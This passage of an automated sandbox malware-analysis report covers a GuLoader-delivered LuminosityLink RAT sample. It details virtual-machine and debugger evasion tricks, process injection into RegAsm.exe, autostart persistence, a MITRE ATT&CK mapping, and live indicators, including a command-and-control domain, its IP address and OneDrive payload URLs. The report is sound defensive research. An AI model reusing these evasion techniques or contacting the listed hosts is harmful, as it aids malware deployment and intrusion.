            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Contains functionality to detect hardware virtualization (CPUID execution measurement)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F08F5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C38F5A
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | File opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037990478.00000000005FA000.00000004.00000020.sdmp | Binary or memory string: _ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, RegAsm.exe, 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | RDTSC instruction interceptor: First address: 000000000224468B second address: 000000000224468B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F8484416248h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp ax, cx 0x00000022 test edx, eax 0x00000024 pop ecx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp cx, dx 0x0000002b cmp ecx, 00000000h 0x0000002e jne 00007F8484416228h 0x00000030 push ecx 0x00000031 cmp ax, ax 0x00000034 call 00007F848441626Bh 0x00000039 call 00007F848441625Ah 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F016BE rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\782401\anibtcent.exe.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window / User API: threadDelayed 1395
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6984 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6168 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1564 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1528 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\782401\anibtcent.exe.exe TID: 2812 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6900 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5616 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
            Source: RegAsm.exe, 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: vmicvss
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW&
            Source: RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000013.00000002.24265233992.0000000000E4A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWen-USn
            Source: RegAsm.exe, 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, RegAsm.exe, 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
            Source: RegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmp | Binary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037990478.00000000005FA000.00000004.00000020.sdmp | Binary or memory string: _rogram Files\Qemu-ga\qemu-ga.exe
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information queried: ProcessInformation

            Anti Debugging:

            Contains functionality to hide a thread from the debugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F09EF3 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Thread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process queried: DebugPort
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F016BE rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F02A91 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F0949D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F01E6C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F081B7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F08799 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F04109 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C32A91 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C3949D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C31E6C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C38799 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C381B7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C34109 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: F00000
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: C30000
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe'
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmp | Binary or memory string: 1Program Manager
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected LuminosityLink RAT
            Source: Yara match | File source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            Remote Access Functionality:

            Yara detected LuminosityLink RAT
            Source: Yara match | File source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation1 | Registry Run Keys / Startup Folder31 | Access Token Manipulation1 | Masquerading21 | Input Capture11 | Security Software Discovery821 | Remote Services | Input Capture11 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | DLL Side-Loading1 | Process Injection112 | Virtualization/Sandbox Evasion33 | LSASS Memory | Virtualization/Sandbox Evasion33 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder31 | Disable or Modify Tools1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | DLL Side-Loading1 | Access Token Manipulation1 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol1 | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection112 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information1 | DCSync | System Information Discovery22 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 112557
            Sample: New Inquiry 9038387377777...
            Start date: 17/09/2020
            Architecture: WINDOWS
            Score: 100

            Root (node 2): contacts onedrive.live.com and eaup2w.sn.files.1drv.com; signatures: Potential malicious icon found, Multi AV Scanner detection for submitted file, Yara detected GuLoader, 3 other signatures; started New Inquiry 9038387377777...exe (node 9), demisphereklediskene.exe (node 12), RegAsm.exe (node 14), demisphereklediskene.exe (node 16)
            Node 9, New Inquiry 9038387377777...exe: Writes to foreign memory regions; Tries to detect Any.run; Hides threads from debuggers; started RegAsm.exe (node 18), RegAsm.exe (node 23)
            Node 12, demisphereklediskene.exe: Multi AV Scanner detection for dropped file; started RegAsm.exe (node 25)
            Node 14, RegAsm.exe: started conhost.exe (node 27)
            Node 18, RegAsm.exe: network: nobawi.dvrdns.org 194.5.97.46, ports 3021, 49780, 49781, DANILENKODE Netherlands; 192.168.0.2 unknown unknown; 2 other IPs or domains; dropped: C:\Users\user\...\demisphereklediskene.exe (PE32), C:\Windows\SysWOW64\clientsvr.exe (PE32), C:\ProgramData\782401\anibtcent.exe.exe (PE32); signatures: Creates an undocumented autostart registry key, Creates multiple autostart registry keys, Creates an autostart registry key pointing to binary in C:\Windows, 2 other signatures; started anibtcent.exe.exe (node 29), conhost.exe (node 31)
            Node 23, RegAsm.exe: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Contains functionality to detect hardware virtualization (CPUID execution measurement); Contains functionality to hide a thread from the debugger
            Node 25, RegAsm.exe: network: onedrive.live.com, eaup2w.sn.files.1drv.com; Tries to detect Any.run; Hides threads from debuggers; started conhost.exe (node 33)
            Node 29, anibtcent.exe.exe: started conhost.exe (node 35)

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            New Inquiry 903838737777721102029393003938.exe | 21% | Virustotal |
            New Inquiry 903838737777721102029393003938.exe | 19% | ReversingLabs |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\ProgramData\782401\anibtcent.exe.exe | 0% | Virustotal |
            C:\ProgramData\782401\anibtcent.exe.exe | 0% | Metadefender |
            C:\ProgramData\782401\anibtcent.exe.exe | 0% | ReversingLabs |
            C:\Users\user\Hustankesgy3\demisphereklediskene.exe | 21% | Virustotal |
            C:\Users\user\Hustankesgy3\demisphereklediskene.exe | 19% | ReversingLabs |
            C:\Windows\SysWOW64\clientsvr.exe | 0% | Virustotal |
            C:\Windows\SysWOW64\clientsvr.exe | 0% | Metadefender |
            C:\Windows\SysWOW64\clientsvr.exe | 0% | ReversingLabs |

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            nobawi.dvrdns.org | 194.5.97.46 | true | false |  | unknown
            onedrive.live.com | unknown | unknown | false |  | high
            eaup2w.sn.files.1drv.com | unknown | unknown | false |  | high

                  URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://eaup2w.sn.files.1drv.com/ | RegAsm.exe, 0000000D.00000002.24301095324.000000000107D000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmp | false |  | high
            https://onedrive.live.com/l | RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmp | false |  | high
            https://aka.ms/hcsadmin | RegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmp | false |  | high
            https://onedrive.live.com/ | RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmp | false |  | high
            https://eaup2w.sn.files.1drv.com/y4m4bqAkwHQUJx1iHbF6prKSSCddXNt-56Mg951zMrckoiAx-x88t2pks0UEJqWB7st | RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmp | false |  | high
            https://eaup2w.sn.files.1drv.com/y4mcRoU26afjmMcM96C_CG1xmFAJaGVWXqZWLE8oSmKi-bsn2pOmBTUtvaCnggDIr1k | RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmp | false |  | high
            https://onedrive.live.com/download?cid=249E8FCE0A15C968&resid=249E8FCE0A15C968%211276&authkey=ADoYXV | RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmp | false |  | high

                                Contacted IPs

                                Public

IP | Country | ASN | ASN Name | Malicious
194.5.97.46 | Netherlands | 208476 | DANILENKODE | false

                                Private

                                IP
                                192.168.0.2

                                General Information

                                Joe Sandbox Version:30.0.0 Red Diamond
                                Analysis ID:112557
                                Start date:17.09.2020
                                Start time:09:13:31
                                Joe Sandbox Product:Cloud
                                Overall analysis duration:0h 8m 22s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:New Inquiry 903838737777721102029393003938.exe
                                Cookbook file name:default.jbs
                                Analysis system description:W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
Number of new started processes analysed:24
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@16/8@10/2
                                EGA Information:
                                • Successful, ratio: 71.4%
                                HDC Information:
                                • Successful, ratio: 53.8% (good quality ratio 19.1%)
                                • Quality average: 24.7%
                                • Quality standard deviation: 36.3%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 265
                                • Number of non-executed functions: 19
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, LocalBridge.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 40.67.251.132, 23.55.161.163, 23.55.161.152, 13.107.42.13, 13.107.42.12, 40.90.22.186, 40.90.22.191, 40.90.22.183, 40.90.22.192, 40.90.22.189, 40.90.22.184, 40.90.22.188, 40.90.22.187, 51.143.111.7
